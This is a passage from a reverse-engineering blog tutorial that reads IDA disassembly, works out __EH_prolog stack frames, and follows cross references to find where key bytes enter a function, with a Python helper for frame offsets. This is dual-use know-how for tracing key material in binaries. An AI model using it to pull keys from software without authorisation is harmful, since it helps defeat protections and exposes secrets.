<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">To skip some boring calculations, let's just say that "__EH_prolog" sets <i>ebp</i> to <i>esp-4</i>, where <i>esp</i> is the value it had at the moment of the call, i.e. just below the 48h bytes reserved by the <i>sub</i>. After the execution of these instructions, the stack will look like this, lowest address on the left:</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">... [prolog][48h bytes][ebp][ret_addr][param_1][param_2] ...</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">So:</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">prolog + 48h + ebp + ret_addr + param_1 = 4h + 48h + 4h +4h +4h = 58h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">That matches: <i>ebp+58h</i> is the address of <i>param_2</i>, the second parameter of the function we are in (and <i>ebp+54h</i> would be <i>param_1</i>).</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Once again, let's name the function we are in "go" and look for its second parameter through the cross reference to its caller:</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003254</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> sub esp, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">14</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003257</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov eax, esp</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003259</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">78</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h], esp</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000325C</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000325D</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov ebx, [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">68</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003260</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call do_newcopy_addref</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003265</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov byte ptr [ebp-</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">2</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003269</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push dword_10091C08</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000326F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov byte ptr [ebp-</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003273</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call go </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">And here comes the problem: we are looking for the second parameter, but there is only one push. Don't panic.</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Let's look at the code: first it reserves 14h bytes on the stack with <i>sub esp, 14h</i>, and then it calls the "do_newcopy_addref" function, which copies something from the object referenced by the dword at <i>ebp+68h</i> into those 14h bytes at the new top of the stack (<i>eax</i> is <i>esp</i> after the <i>sub</i>). Once again the source is passed in a register, <i>ebx</i> this time, not on the stack!</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, we have to re-figure out what the stack looks like:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">... [prolog][48h bytes][ebp][ret_addr][param_1][14h bytes object] ...</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Basically, <i>param_2 </i>is a <i>14h bytes object</i></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">This is unusual, as normally the code would pass a pointer to the object rather than the object itself. It also makes the code harder to analyze, because IDA no longer recognizes the parameter.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">We are almost done: let's focus on <i>ebp+68h</i> and try to track it back!</span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000323E</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push dword ptr [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">78</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003241</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">68</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h] </span></span></div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003244</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003245</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call sub_1000346A </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">The reasoning is always the same: we see a function with two parameters, one of which is <i>ebp+68h</i>; so we can suppose that the other one, <i>ebp+78h</i>, points to the bytes of the key, and that the function instantiates an object by copying from the key itself.</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now we have to follow <i>ebp+78h</i>. It reminds us of the weird parameter <i>ebp+58h</i> we saw before... So, again, we go to the beginning of the function and notice:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100031FA</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push ebp</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100031FB</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sub esp, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">6C</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100031FE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov eax, offset loc_1006ACBC</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003203</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call __EH_prolog</span></span></div>
<div>
<br /></div>
</span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This time the stack will look like this:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">... [prolog][6Ch bytes][ebp][ret_addr][param_1][param_2] ...</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">and</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">prolog + 6Ch + ebp + retaddr = 4h + 6Ch + 4h + 4h = 78h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, <i>ebp+78h</i> points to <i>param_1</i>.</span></span></div>
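<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">The sum above and the one for the 48h-byte frame shown earlier follow one rule, so here is a small helper that applies it to any <i>[ebp+XX]</i> operand and names the slot it lands in. It is an added example, not code from this post: it encodes the post's own frame model ([prolog][locals][ebp][ret_addr][param_1][param_2]...), assumes 32-bit slots and the 4-byte prolog slot counted in the sum, and takes an optional list of parameter sizes so that the 14h-byte by-value object of the first frame can be described too.</span></div>

```python
"""Frame-offset bookkeeping for the __EH_prolog frames analysed above.
Added example, not code from the post. Model (the post's own):
    ebp -> [prolog slot][locals][saved ebp][ret_addr][param_1][param_2]...
Assumptions: 32-bit slots, and one 4-byte prolog slot below the locals."""

PROLOG_SLOT = 4  # the 4h the post counts for __EH_prolog
PTR = 4          # 32-bit code: ebp and return address are 4 bytes each


def params_base(locals_size: int) -> int:
    """ebp offset of param_1: prolog + locals + saved ebp + return address.
    For 'sub esp, 6Ch' this is 4h + 6Ch + 4h + 4h = 78h."""
    return PROLOG_SLOT + locals_size + PTR + PTR


def classify_ebp_offset(offset: int, locals_size: int,
                        param_sizes=None) -> str:
    """Name the frame slot that [ebp+offset] refers to.

    param_sizes lists each parameter's size in push order (missing entries
    default to 4 bytes), so a by-value 14h-byte second parameter is [4, 0x14].
    """
    if offset < 0:
        return "below frame (negative offset)"
    locals_start = PROLOG_SLOT
    saved_ebp = locals_start + locals_size
    ret_addr = saved_ebp + PTR
    params_start = ret_addr + PTR
    if offset < locals_start:
        return "prolog slot"
    if offset < saved_ebp:
        return (f"local at {offset - locals_start:#x} into the "
                f"{locals_size:#x}-byte area")
    if offset < ret_addr:
        return "saved ebp"
    if offset < params_start:
        return "return address"
    # Walk the parameter list until the offset falls inside one parameter.
    sizes = list(param_sizes) if param_sizes else []
    pos, k = params_start, 1
    while True:
        size = sizes[k - 1] if k - 1 < len(sizes) else PTR
        if offset < pos + size:
            inner = offset - pos
            return f"param_{k}" + (f" +{inner:#x}" if inner else "")
        pos += size
        k += 1


if __name__ == "__main__":
    # The two frames from the post: 'sub esp, 48h' and 'sub esp, 6Ch'.
    for off, size, psz in ((0x58, 0x48, [4, 0x14]), (0x78, 0x6C, None),
                           (0x68, 0x6C, None)):
        print(f"[ebp+{off:X}h] with {size:X}h locals -> "
              f"{classify_ebp_offset(off, size, psz)}")
```

With the first frame's sizes, [ebp+58h] resolves to param_2 (the 14h-byte object) and [ebp+68h] in the second frame resolves to a local, which is why the <i>lea eax, [ebp+68h]</i> above builds an object on the stack rather than reading a parameter.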
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Again, we go via Cross Reference to follow <i>param_1</i> and see:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100126FB</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push [ebp+arg_0]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100126FE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call sub_100031FA</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i> </i></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i> </i></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i>arg_0</i> is our target! Another first parameter to follow, another Cross Reference to see:</span></div>
</span><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100033BA</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push [ebp+arg_0]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100033BD</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call sub_100126D5</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
